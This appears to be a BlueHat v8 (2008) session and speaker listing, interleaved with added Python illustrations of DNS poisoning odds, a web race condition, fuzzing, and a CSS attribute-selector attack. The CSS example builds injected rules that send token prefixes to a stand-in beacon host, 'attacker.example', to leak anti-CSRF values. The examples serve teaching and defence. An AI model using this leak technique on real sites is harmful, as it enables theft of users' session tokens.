BlueHat Security Briefings: Fall 2008 Sessions and Interviews
BlueHat v8: C3P0wned was held October 16-17, 2008, at the Microsoft corporate headquarters.
Sessions ranged from in-depth technical security issues to innovative techniques and best practices for the information security field.
The Microsoft Security Development Lifecycle (SDL) team hosted sessions emphasizing secure development and testing practices, as well as how to develop with security in mind from the beginning of the software development lifecycle. The BlueHat SDL sessions focused more on appropriate defense strategies and less on attack techniques. Sessions might include demonstrations of secure coding techniques or methods of using various security tools.
View the BlueHat v8 General Sessions Keynote
As senior vice president of the Windows Core Operating System Division, Jon DeVaan manages the engineering team responsible for creating the core components and architecture of Microsoft Windows.
DeVaan is a 24-year Microsoft veteran, and his extensive experience and knowledge have established him as a respected leader in the technology industry. DeVaan has held a variety of executive and management positions while at Microsoft. Prior to his current role, he started the corporate function of Engineering Excellence, across all Microsoft products.
Previously, DeVaan managed the TV Division at Microsoft, responsible for the UltimateTV service and the Microsoft TV software platform. DeVaan co-managed Microsoft's Consumer and Commerce Group, where he helped design and initiate the turnaround strategy for MSN. DeVaan led Microsoft's Desktop Applications Division, growing the business to US$7 billion in annual revenues. Responsible for the Microsoft Office family of applications and advanced application technologies, DeVaan led the initial design of Microsoft Office 2000, setting the direction of the product to seamlessly integrate Internet technologies and make them easier to use. In addition to serving as vice president of development and director of development for Office95 and 97, DeVaan worked in various capacities ranging from Excel software design engineer to development manager. His leadership and experience provided essential management of cross-platform technology and helped pioneer the development processes used to create Microsoft products. DeVaan has been a guest speaker at many events on the topic of software engineering and in the interactive and cable TV industries. Most notably, DeVaan served as a panelist with United Nations Secretary General Kofi Annan at the 2000 United Nations' World Television Forum to discuss the convergence of TV, digital technology, and the Internet.
DeVaan holds bachelor's degrees in mathematics and computer science from Oregon State University, and holds patents in the area of simplifying user interface elements in PC applications.
DeVaan serves as a trustee of the Oregon State University Foundation, as a technical advisor to the Oregon Innovation Council, and as an ambassador for United Way of King County.
Modern Crimeware is a term coined to describe recent Web-related attacks. In the "old" days of viruses and malware, the primary motive was fame. Modern Crimeware is fueled by financial motives and has evolved into an intricate economy of supply and demand, distributors, affiliations, and pricing models.
With over 10 years of experience in the information security industry, Iftach Amit brings a mixture of software development, OS, network and Web security to Aladdin as the Director of Security Research for eSafe. Prior to Aladdin, Amit was Director of Security Research at Finjan, a Web security company. Earlier, Amit was the founder and CTO of a security startup in the IDS/IPS arena and developed new techniques for attack interception. He also served in a director position at Datavantage (NASDAQ:MCRS) with responsibility for software development and information security, as well as designing and building a financial datacenter. Prior to Datavantage, he managed the Internet application and UNIX departments at Comsec Consulting, where he consulted with major banking and industry companies worldwide. Amit holds a Bachelor's degree in Computer Science and Business Administration from the Interdisciplinary Center Herzliya.
In this presentation, we will show how the abundance of information on the Internet (using the “surface Web” as well as the “deep Web”) can be used to create a comprehensive profile of a person or a group/organization. The presentation will include a real world, live demonstration of the Maltego framework for data collection and correlation. The demo will cover collection and visualization of both open source and internal data sources and will show how n-th order relationships can be found and analyzed using the tool.
Next we will discuss (with live examples) how the lack of true identity on the Internet (using Web sites, social networks, e-mail, and IM) can result in the creation of virtual communities that can be used for anything from stock market manipulation to political gain. Finally, we will discuss possible solutions to the problem, and ways to detect and protect yourself.
Born in South Africa, Roelof Temmingh studied at the University of Pretoria and completed his Electronic Engineering degree in 1995. He worked as a developer, and later as a system architect at an information security engineering firm from 1995 to 2000. Early in 2000 he started the security assessment and consulting firm, SensePost, with some of the leading thinkers in the field. During his time at SensePost, he was the Technical Director in charge of the assessment team and later headed the Innovation Centre for the company. Temmingh spoke at various international conferences such as Black Hat, Defcon, CanSecWest, RSA, Ruxcon, HiTB, and FIRST. He also contributed to books such as Stealing the Network: How to Own a Continent, and Google Hacking for Penetration Testers, Volume 2, and was a lead trainer in the "Hacking by Numbers" training course. Temmingh authored the initial releases of several well known security testing applications such as Wikto, Crowbar, BiDiBLAH, and Suru. At the start of 2007, Temmingh founded Paterva in order to pursue his interest in research and development. Here he created the information collection, correlation, and visualization tool known as Maltego.
DNS is at the heart of every network: when a Web site is browsed, DNS says where the site is, and when an e-mail is sent, DNS says where to. The answer provided by DNS is usually correct, but not always. Six months ago, it became clear that there was an ancient design flaw, present in the original 1983 specification for DNS, that would allow attackers to insert their own addresses for DNS names. An industry-wide bug hunt commenced, culminating in a simultaneous release date of patches for virtually all platforms. The presenters will talk about the issue, and about how a partnership between industry competitors and researchers helped protect all Web users.
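The abstract does not spell out the mechanics, so here is the underlying arithmetic as an added example (my code, not the presenters' material). A resolver pairs a reply with its pending query by matching a 16-bit transaction ID, and before the 2008 patches the UDP source port was in practice fixed or predictable, so an attacker who could guess the ID and land a forged reply ahead of the real one got the resolver to cache an address of their choosing. The coordinated fix randomized the source port, which roughly squares the guessing space. The model assumes distinct guesses per lookup and ignores timing, rate limits and the legitimate answer winning the race; those are simplifications, not facts from the page.

```python
from __future__ import annotations
import random


def forgery_probability(id_bits: int, forged_per_query: int, queries: int) -> float:
    """Probability that at least one of `queries` lookups gets a forged reply accepted.

    Model: the resolver accepts the first reply whose identifier matches the one it
    chose uniformly from 2**id_bits values; before the real reply arrives the attacker
    delivers `forged_per_query` replies carrying distinct guesses (an assumption).
    """
    space = 2 ** id_bits
    per_query = min(1.0, forged_per_query / space)
    return 1.0 - (1.0 - per_query) ** queries


def expected_queries_to_poison(id_bits: int, forged_per_query: int) -> float:
    """Mean number of lookups the attacker must race before one is poisoned."""
    space = 2 ** id_bits
    return space / min(forged_per_query, space)


def simulate_race(id_bits: int, forged_per_query: int, queries: int, seed: int = 0) -> int:
    """Monte Carlo version of the same race.

    Returns the 1-based index of the first poisoned lookup, or 0 if none was.
    """
    rng = random.Random(seed)
    space = 2 ** id_bits
    for q in range(1, queries + 1):
        real_id = rng.randrange(space)                       # what the resolver is waiting for
        guesses = rng.sample(range(space), min(forged_per_query, space))
        if real_id in guesses:
            return q
    return 0


if __name__ == "__main__":
    # Transaction ID only (16 bits) versus transaction ID plus a random source port
    # (about 32 bits), with an attacker able to land 1000 forged replies per lookup.
    for bits in (16, 32):
        print(f"{bits}-bit identifier: P(poisoned within 100 lookups) = "
              f"{forgery_probability(bits, 1000, 100):.4f}, "
              f"expected lookups to poison = {expected_queries_to_poison(bits, 1000):,.0f}")
```

With only the 16-bit ID, an attacker who can push a thousand forged replies per lookup poisons a resolver within a few dozen lookups; with the port randomized as well, the same attacker needs millions. Port randomization raises the cost rather than removing the flaw, which is why it was shipped as a stopgap and why DNSSEC is the structural answer.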
Dan Kaminsky is a longstanding speaker at the Black Hat Briefings, and will be delivering his ninth address this year. Dan has spent his entire career with Fortune 500 companies, having spent two years at Cisco, another two at Avaya, and most recently as a consultant for Microsoft. His research focuses on design characteristics of complex systems in order to make old systems do new things, and lately, to break new things in old ways. The Director of Penetration Testing for IOActive, Kaminsky is based in Seattle.
CSS has many uses and abuses. Cascading Style Sheets (CSS) can be used for a lot more than making a Web site look sexy. The presenters will detail how to scan your internal network, track visited links on third-party Web sites, and read the content of third-party Web sites, such as your password. We will also discuss how to use CSS to detect the presence of plug-ins, detect access to certain zones or Web sites, show how algorithmic logic in CSS is possible, and finally demonstrate how CSS injections can be obfuscated to create difficult-to-detect cross-site scripting vectors. All of this will be demonstrated in a non-scripted environment.
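As an added illustration (not the presenters' slides or code), the following reconstructs the attribute-selector approach to reading an attribute value with CSS alone: inject one rule per candidate next character, each with a `background-image` pointing at a beacon URL, and let the browser's own selector matching tell you which prefix is right. `BEACON` and the `input[name="csrf"]` target are assumptions chosen for the example, and `browser_fetches` is a stand-in that emulates only the `[value^="..."]` test, not a real browser.

```python
from __future__ import annotations
import string
from urllib.parse import quote, unquote

ALPHABET = string.ascii_lowercase + string.digits
BEACON = "https://attacker.example/leak"          # hypothetical collection endpoint
TARGET = 'input[name="csrf"]'                     # hypothetical element whose value attribute is wanted


def leak_rules(prefix: str, alphabet: str = ALPHABET) -> str:
    """CSS for one round: one rule per candidate next character.

    The browser evaluates every selector, but it only requests the background image of
    a rule whose [value^="..."] prefix really matches, so the request that reaches
    BEACON names the correct prefix, one character longer than before.
    """
    rules = []
    for ch in alphabet:
        guess = prefix + ch
        rules.append(f'{TARGET}[value^="{guess}"]{{background-image:url({BEACON}?v={quote(guess)})}}')
    return "\n".join(rules)


def browser_fetches(css: str, value: str) -> list[str]:
    """Stand-in for the browser: the beacon URLs whose [value^=...] test the attribute passes."""
    fetched = []
    for rule in css.splitlines():
        start = rule.index('[value^="') + len('[value^="')
        guess = rule[start:rule.index('"', start)]
        if value.startswith(guess):
            fetched.append(rule[rule.index("url(") + 4:rule.index(")")])
    return fetched


def leak_value(secret: str, alphabet: str = ALPHABET, max_len: int = 64) -> str:
    """Run the rounds: each injected stylesheet recovers one more character."""
    known = ""
    for _ in range(max_len):
        hits = browser_fetches(leak_rules(known, alphabet), secret)
        if not hits:
            break                                   # end of value, or a character outside the alphabet
        known = unquote(hits[0].split("?v=", 1)[1])
    return known


if __name__ == "__main__":
    print(leak_rules("s3").splitlines()[2])         # the rule that fires for a token starting "s3c"
    print(leak_value("s3cr3t"))
```

Two caveats a tester should keep in mind: attribute selectors match the attribute in the markup, so the realistic targets are values the server rendered into the page (anti-CSRF tokens in hidden fields), not text the user types into a field afterwards; and each round needs either a fresh injection or a stylesheet that carries rules for every prefix up front. On the defensive side, a `Content-Security-Policy` `style-src` that excludes `'unsafe-inline'` removes the injection vector, and browsers have since restricted what `:visited` styling can reveal.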
David Lindsay is a security engineer with Security Innovation, an application security company. David enjoys visiting museums with his 2-year-old daughter hacker, armchair politics, cryptography and researching Web vulnerabilities. David graduated from the University of Utah with a Master’s degree in Mathematics.
Gareth Heyes is based in the UK and specializes in Web application security and particularly likes hacking XSS Filters for fun. Gareth has created many online security tools and fuzzers, and is the developer of Hackvertor. He's married and has a 5-week-old daughter, and in his spare time enjoys playing 5-a-side football.
Eduardo Vela Nava
Eduardo Vela Nava is a student of Computer Sciences at ITESM CEM, Mexico, and a security engineer for hi5. Eduardo has been a Web application security researcher for the last couple of years, focusing on Web server and Web client vulnerabilities. Eduardo is co-administrator of the largest Spanish security community Web site (elhacker.net), and in his free time he loves playing piano.
Software security research is an ideal area in which to feature information visualization techniques. This talk will discuss the latest in program visualization and show examples of ongoing research at universities and corporations worldwide. Several visualization techniques will be examined for usability in software security and a short discussion of graph layouts will illustrate the function and ideal use for each. Finally, internally developed processes for creating visualizations from data derived from static analysis will also be demonstrated.
Richard Johnson is a computer security specialist with nearly a decade of professional experience. Currently employed by Microsoft, Richard works with the Security Engineering and Communications Division, tasked with reviewing the design and implementation of Microsoft's premier products including Microsoft Windows, Microsoft Office, and Windows Mobile.
Richard has been a public speaker at worldwide security events since 2004, presenting research on topics ranging from program analysis to system mitigation design. Richard has contributed public source code for binary integrity monitoring, system debugging, and reverse engineering. Richard is also the co-founder of The Uninformed Journal.
This presentation will focus on methods identified as high-risk components that need special attention in the form of design and code reviews. The presenter will be covering the following topics:
Ian Hellen is a Senior Security Engineer in Windows Security Assurance (a.k.a. SWI) at Microsoft. He is working on a toolset to help determine the security risk of code. Over the past 3 years he ran the security design reviews for Windows 7, Windows Server 2008, and Windows Vista. Prior to joining the Security Engineering Department, he was a security consultant in Microsoft Services for 7 years, working with enterprise customers on infrastructure and application security. He’s written a couple of (extremely obscure) books on wireless LAN security and other papers on various security topics, and he has spoken in some interesting places.
NOTE: The Suddenly Psychic: Knowing Everything About Everyone session by Nitesh Dhanjani and Akshay Aggarwal has been withdrawn from the Day 1 speaker lineup.
View the SDL Sessions Keynote
Scott Charney serves as corporate vice president of the Microsoft Trustworthy Computing (TwC) Group within the Core Operating System Division. The group’s mission is to drive Trustworthy Computing principles and processes within Microsoft and throughout the IT ecosystem. This includes working with business groups throughout the company to ensure their products and services uphold Microsoft security and privacy policies, controls, and best practices. The TwC group also collaborates with the rest of the computer industry and the government to increase public awareness, education, and other safeguards. In addition, Charney oversees Microsoft efforts to address critical infrastructure protection, engineering excellence, network security, and industry outreach about privacy and security.
Threat modeling is one of the most effective ways to build security into software. When we rolled out threat modeling to software development teams across EMC, we found that traditional approaches require security expertise and the ability to think like an attacker--characteristics that many software developers don't have. Over time, we developed a simple threat modeling approach that is tailored for use by software developers with only a basic level of security knowledge. The approach involves:
This approach has been effectively used for over a year at EMC. During the session, I will share details of the approach we developed to identify threats and assess risk as well as general insights from threat modeling at EMC.
Danny Dhillon currently serves as part of the EMC Product Security Office where he specializes in secure design. Prior to EMC, he worked at RSA Security on various enterprise security products. He is the author of ACM and IEEE conference publications on securing mobile ad hoc network routing and applied threshold cryptography.
Adam will present the Microsoft SDL threat modeling process with newly announced tooling. We are learning from mistakes in earlier approaches, and like the second Death Star, Microsoft threat modeling processes are adapting and evolving. Witness the awesome power of this fully armed and operational approach to discovering and analyzing threats before the code has been written.
Adam Shostack is senior program manager in the Security Engineering and Community Group at Microsoft. He is part of the Microsoft Security Development Lifecycle team, where he is responsible for security design analysis techniques.
Shostack joined Microsoft in 2006 with an extensive background in software security. Before Microsoft, he was involved in a number of successful startups focused on vulnerability scanning, privacy, and program analysis.
Shostack helped create the Common Vulnerabilities and Exposures (CVE) list and is now the Emeritus Advisor of the group. He also helped found both the International Financial Cryptography Association (IFCA) and the Privacy Enhancing Technologies Symposium, and has been a technical advisor to companies such as Counterpane Internet Security and Debix. Shostack has published articles in a variety of industry and academic venues and is also co-author of The New School of Information Security (Addison-Wesley, April 2008).
Reliable exploitation techniques for software vulnerabilities have been developed and refined over the past decade to the point that most classes of vulnerabilities can be trivially exploited. The sophistication of these exploitation techniques has warranted the development of equally sophisticated mitigations such as GS, DEP, and ASLR. This presentation explores the technical details of these developments by illustrating the logical evolution of Microsoft mitigations. This evolution will be shown in terms of which problem each mitigation is attempting to solve, the methods taken to solve it, and how well each mitigation has stood the test of time. This knowledge should provide attendees with a detailed understanding of how Microsoft mitigations currently work and how product teams can best take advantage of them.
Matt Miller has been an active member of the security research and development community where he focuses primarily on areas relating to exploitation technology and reverse engineering. Matt joined the Metasploit project in 2004 and contributed to the advancement of the Metasploit framework. Some of these advancements included the Meterpreter, VNC injection, and his work as a core developer on Metasploit 3.0. Matt is also an editor and contributor to the Uninformed Journal which is a free, community-driven outlet for new research. Matt's contributions to the journal have included papers on bypassing PatchGuard and DEP, as well as other techniques that can be used to improve or inhibit exploit reliability. In addition to his work with Metasploit and Uninformed, Matt also developed a functional implementation of Address Space Layout Randomization (ASLR) for Windows 2000, Windows XP, and Windows Server 2003 prior to the integration of ASLR into Windows Vista. Matt recently joined the Microsoft SWI Security Science team, where he is focused on program security analysis and mitigations.
Modern Web application frameworks are designed for developer productivity and performance. They are highly scalable, object-oriented, and can be used to create a usable Web site in a matter of minutes. However, these attributes often encourage programming practices that make managing state difficult for a typical programmer.
Web application developers must carefully manage access to all resources that can be shared by threads. Global variables, session variables, backend systems, and application-specific data stores are common examples of such resources.
Concurrency flaws result when access to shared resources is not managed properly—something that is easy to do when the development environment purposefully encapsulates and abstracts the resources that need to be managed! Attackers take notice when manipulating those resources carries a security impact.
Each prevalent class of security flaw shares a common attribute: mistakes happen when doing the right thing is difficult. It is the opinion of the presenters that concurrency flaws, especially in the context of Web applications, share this attribute. The presenters will provide insight into the ease with which concurrency flaws can be introduced into systems, offer guidance on evaluating the security impact of such flaws, and discuss strategies for eliminating such flaws that will be helpful to developers and testers alike.
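An added example (mine, not iSEC's) of the check-then-act flaw the abstract describes, reduced to a coupon code that must be redeemed once. `SharedStore` is a constructed stand-in for a session dictionary or a backend row, and the `threading.Barrier` is a hypothetical device that makes the race reproducible: it stands for whatever delay separates the check from the update, which an attacker's burst of simultaneous requests will eventually straddle in production.

```python
from __future__ import annotations
import threading


class SharedStore:
    """Constructed stand-in for state that request threads share: a session variable,
    a module-level global, or a row in a backend system."""

    def __init__(self) -> None:
        self.redeemed = set()        # coupon codes already used
        self.credit = 0              # balance the coupon adds to
        self.lock = threading.Lock()


def redeem_racy(store: SharedStore, code: str, window: threading.Barrier) -> bool:
    """Check, then act, with nothing keeping the two together."""
    already = code in store.redeemed     # check
    window.wait()                        # hypothetical delay between check and act (DB round trip etc.)
    if already:
        return False
    store.redeemed.add(code)             # act: every racer that passed the check lands here
    store.credit += 100
    return True


def redeem_atomic(store: SharedStore, code: str, window: threading.Barrier) -> bool:
    """Same logic, but check and act form one indivisible step."""
    with store.lock:
        already = code in store.redeemed
        if not already:
            store.redeemed.add(code)
            store.credit += 100
    window.wait()                        # the same delay, now outside the decision
    return not already


def run_race(handler, requests: int = 8) -> tuple:
    """Fire `requests` simultaneous redemptions of one code; return (successes, credit)."""
    store = SharedStore()
    window = threading.Barrier(requests)
    outcomes = []
    threads = [threading.Thread(target=lambda: outcomes.append(handler(store, "WELCOME100", window)))
               for _ in range(requests)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(outcomes), store.credit


if __name__ == "__main__":
    print("racy   :", run_race(redeem_racy))      # (8, 800): one coupon paid out eight times
    print("atomic :", run_race(redeem_atomic))    # (1, 100)
```

The lock only protects one process. A Web application served by several worker processes or hosts has to push the atomicity into the shared store itself: a conditional `UPDATE ... WHERE redeemed = 0` whose affected-row count decides the outcome, a unique constraint, or a compare-and-set on the session backend. That is the practical consequence of the abstract's point that frameworks abstract away which resources are shared.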
Scott Stender is a founding partner of iSEC Partners, a strategic digital security organization. Scott brings with him several years of experience in large-scale software development and security consulting, having worked at companies such as @stake and Microsoft. Scott is a noted researcher who focuses on secure software engineering and security analysis of core technologies. He holds a Bachelor of Science degree in Computer Engineering from the University of Notre Dame.
Alex Vidergar served as a development engineer in the United States Air Force for six years prior to working for iSEC Partners. Assigned originally to the training system product group, he managed standard development for network integration standards between distributed aircraft simulators (Distributed Mission Operations). He obtained a masters degree in Computer Engineering with a focus on computer networking security from the Air Force Institute of Technology. His master's thesis focused on security protocol analysis using the Strand Space formalism applied to Simple Public Key Infrastructure. He most recently worked at the Air Force Information Operations Center, Headquarters Air Intelligence Agency, where he managed system and network security assessments for classified applications and services.
This is a multi-part presentation shared between members of the SWI Tools team, discussing several aspects of Fuzzing: “How should I fuzz? When have I fuzzed enough? What do I do now that I’ve fuzzed?”
Jason Shirk will cover "How Should I Fuzz?" The SWI Tools team is responsible for providing tools across Microsoft to test for compliance with the SDL. Some areas, though important, are finite. Fuzzing approaches infinite numbers, types and methods of testing, and there is room (and necessity) for a number of tools. Certainly, not all fuzzers are created equal, but are their differences worse, or necessary? What should you look for in different types of fuzzers? What kind of commitment are you making when you choose a fuzzer? We will have completed the Fuzzing Olympics in time for this presentation, and I will make some comparisons between fuzzing models, and what we've found to be true at Microsoft in a smart vs. dumb fuzzing battle. The merits of several approaches, without giving out the exact specifics of how we test, will be discussed. The presenters do not intend to repeat Charlie Miller's book here, but will show how it applies to software manufacturers, and discuss a type of blended approach to the space. Discussing approaches should then lead well into Lars's presentation.
Lars Opstad will cover: “How Much Do I Fuzz? When Have I Fuzzed Enough?” The SWI Tools team ran a large fuzzing effort recently for a major Microsoft product. By running millions of manipulations and iterations across many machines, we discovered some things about fuzzing. There is a point of diminishing returns for fuzzing: at this point, most of the fuzzing effort can be stopped. Some late returns can still find very important issues, so designating a box to fuzz “forever” isn’t a bad idea. Indicators to use to determine when to decrease fuzzing depend on a number of factors, which will be covered in this presentation.
Dave Weinstein will cover: “What Do I Do Now That I’ve Fuzzed?”
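An added example (not the SWI Tools team's code) that puts the three questions above into one loop: how (dumb byte-level mutation of a seed input), how much (stop once `patience` iterations pass without any new line coverage, the point of diminishing returns the second talk describes), and what now (deduplicate crashes by exception type and line so a thousand hits become a handful of bugs to file). `parse_records` is a constructed target with a deliberate missing bounds check, and the coverage measurement approximates basic-block coverage with CPython's `sys.settrace` line events.

```python
from __future__ import annotations
import random
import sys
from dataclasses import dataclass, field

# Constructed seed: count=2, then ("abc", checksum 38) and ("xy", checksum 241).
SEED_INPUT = bytes([2, 3]) + b"abc" + bytes([38, 2]) + b"xy" + bytes([241])


def parse_records(buf: bytes) -> list:
    """Constructed target. Format: count byte, then per record a length byte, the payload,
    and a checksum byte (sum of payload mod 256). ValueError is the deliberate rejection
    path; any other exception is a defect."""
    count = buf[0]
    pos = 1
    records = []
    for _ in range(count):
        n = buf[pos]
        if n > 16:
            raise ValueError("record too long")
        payload = buf[pos + 1:pos + 1 + n]
        checksum = buf[pos + 1 + n]          # constructed bug: trusts n, never checks len(buf)
        if sum(payload) & 0xFF != checksum:
            raise ValueError("bad checksum")
        records.append(payload)
        pos += 2 + n
    return records


def run(data: bytes) -> tuple:
    """Execute the target under a line tracer.
    Returns (set of executed line numbers, crash signature or None)."""
    code = parse_records.__code__
    lines = set()

    def tracer(frame, event, arg):
        if frame.f_code is code:                 # only trace the target's own frame
            if event == "line":
                lines.add(frame.f_lineno)
            return tracer
        return None

    crash = None
    sys.settrace(tracer)
    try:
        parse_records(data)
    except ValueError:
        pass                                     # rejected input: expected behaviour
    except Exception as exc:                     # anything else is a crash to triage
        tb = exc.__traceback__
        while tb.tb_next is not None:
            tb = tb.tb_next
        crash = (type(exc).__name__, tb.tb_lineno)
    finally:
        sys.settrace(None)
    return lines, crash


def mutate(data: bytes, rng: random.Random) -> bytes:
    """Dumb mutation: overwrite, bit-flip, insert or delete one byte."""
    b = bytearray(data)
    op = rng.randrange(4)
    if op == 0 and b:
        b[rng.randrange(len(b))] = rng.randrange(256)
    elif op == 1 and b:
        b[rng.randrange(len(b))] ^= 1 << rng.randrange(8)
    elif op == 2:
        b.insert(rng.randrange(len(b) + 1), rng.randrange(256))
    elif b:
        del b[rng.randrange(len(b))]
    return bytes(b)


@dataclass
class Campaign:
    iterations: int = 0
    coverage: set = field(default_factory=set)    # line numbers ever executed
    crashes: set = field(default_factory=set)     # deduplicated (exception, line) signatures
    last_new_coverage: int = 0
    stopped_early: bool = False


def fuzz(seeds, max_iters: int = 20000, patience: int = 500, seed: int = 1) -> Campaign:
    """Mutate until `patience` iterations pass without new coverage, or max_iters is hit."""
    rng = random.Random(seed)
    corpus = list(seeds)
    c = Campaign()
    for data in corpus:
        lines, crash = run(data)
        c.coverage |= lines
    for i in range(1, max_iters + 1):
        c.iterations = i
        candidate = mutate(rng.choice(corpus), rng)
        lines, crash = run(candidate)
        if crash is not None:
            c.crashes.add(crash)
        if not lines <= c.coverage:                  # new lines: keep the input, reset the clock
            c.coverage |= lines
            corpus.append(candidate)
            c.last_new_coverage = i
        if i - c.last_new_coverage >= patience:      # diminishing returns: stop this campaign
            c.stopped_early = True
            break
    return c


if __name__ == "__main__":
    result = fuzz([SEED_INPUT])
    print(f"stopped after {result.iterations} iterations, {len(result.coverage)} lines covered")
    for name, line in sorted(result.crashes):
        print(f"crash: {name} at line {line}")
```

The stop rule is the part to adapt rather than copy: for a real parser the coverage signal is edges or blocks from an instrumented build, and as the second talk notes, a late hit can still matter, so the usual compromise is to end the broad campaign at the coverage plateau while one box keeps going against the same corpus. Each `(exception, line)` pair is then one item for the review queue, which is where the third talk picks up.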
Jason Shirk is a program manager on the SWI Tools team at Microsoft. His focus is the Microsoft Fuzzing Strategy, and he is responsible for a number of internal tools. Before coming to Microsoft, Jason worked in Telecom Security, and as a missionary in the Ukraine.
Lars Opstad is the Security group manager of the SWI Tools team. After spending the first 12 years of his Microsoft career in the Windows Testing organization, Lars came to the SWI Tools team in 2005 as team manager and leader of the Windows Vista Fuzzing Effort.
Dave Weinstein is a senior security developer on the SWI Tools team. After simulating blowing things up as a developer on such games as Rainbow Six, he was uniquely qualified to write the Fuzzer Common Library and blow up software across Microsoft.
The presenters will provide a thorough and objective review of the benefits, shortcomings, and trade-offs of static code analysis tools, black box application scanners, and expert analysis. This session is important for anyone involved with the security review of source code from management to developers.
Vincent Liu, CISSP, is the Managing Director at Stach & Liu, a professional services firm providing advanced IT security solutions to Fortune 500 companies, national law firms, and global financial institutions.
Before founding Stach & Liu, Vincent led the Attack & Penetration and Reverse Engineering teams for the Global Security unit at Honeywell International. In addition, he was a consultant with the Ernst & Young Advanced Security Centers and an analyst at the National Security Agency. In these roles Liu gained extensive experience conducting risk assessments, performing application code reviews, and supporting incident-response situations.
Vincent is a developer for the Metasploit Project and a respected member of the security community. He is an experienced speaker and has presented his research at conferences including Black Hat, ToorCon, and Microsoft BlueHat. Vincent has given interviews, and contributed to journals and books including: Penetration Tester’s Open Source Toolkit; Writing Security Tools and Exploits; Sockets, Shellcode, Porting, & Coding; and Hacking Exposed Wireless.
Vincent holds a Bachelor of Science and Engineering degree from the University of Pennsylvania with a major in Computer Science and Engineering and a minor in Psychology.
Q&A format topical panel discussion.
Arian Evans is the Director of Operations at WhiteHat Security, leading a team of security engineers assessing over 600 production Web sites. Arian has worked at the forefront of Web application security for more than 10 years. His global projects include work with the Center for Internet Security, NIST, the FBI, the Secret Service, and many commercial organizations on Web application security and hacking incident-response.
Arian consistently researches and discloses new attack techniques and vulnerabilities in Web application software, including commercial platforms like Cisco and Nokia. Arian is a frequent speaker at industry conferences including Black Hat, OWASP, RSA, WASC, and software developer events and was a contributing author to Hacking Exposed Web Applications.
Mike Andrews is a principal at Foundstone, specializing in software security and leads the Web application security assessments and Ultimate Web Hacking classes. He brings with him a wealth of commercial and educational experience from both sides of the Atlantic and is a widely published author and speaker.
Before joining Foundstone, Mike was a freelance consultant and developer of Web-based information systems working with clients such as the Economist, British Airways, London transport authority and various UK universities. In 2002, after being an instructor and researcher for a number of years in the UK, Mike joined the Florida Institute of Technology as an assistant professor where he was responsible for research projects and independent security reviews for the Office of Naval Research, Air Force Research Labs and Microsoft Corporation.
Mike holds a PhD in Computer Science from the University of Kent at Canterbury in the United Kingdom where his focus was on debugging tools and programmer psychology.
Nathan McFeters is a Manager in Ernst & Young's Advanced Security Center (ASC) and is currently serving in a Security Evangelist role for the ASC based out of Chicago, Illinois. Nathan has performed Web application, deep source code, Internet, Intranet, wireless, dial-up, and social engineering engagements for several clients in the Fortune 500 during his career at Ernst & Young and has spoken at a number of prestigious conferences, including Black Hat, BlueHat, DEFCON, ToorCon, OWASP, and Hack in the Box. Nathan is also a veteran of the ZDNet Zero Day blog, where he has written about all topics related to security.
Bryan Sullivan is a Security Program Manager on the Security Development Lifecycle (SDL) team at Microsoft. He is a frequent speaker at industry events, including Black Hat, BlueHat, and RSA Conference. Bryan is also a published author on Web application security topics. His first book, AJAX Security, co-written with Billy Hoffman, was published by Addison-Wesley in 2007.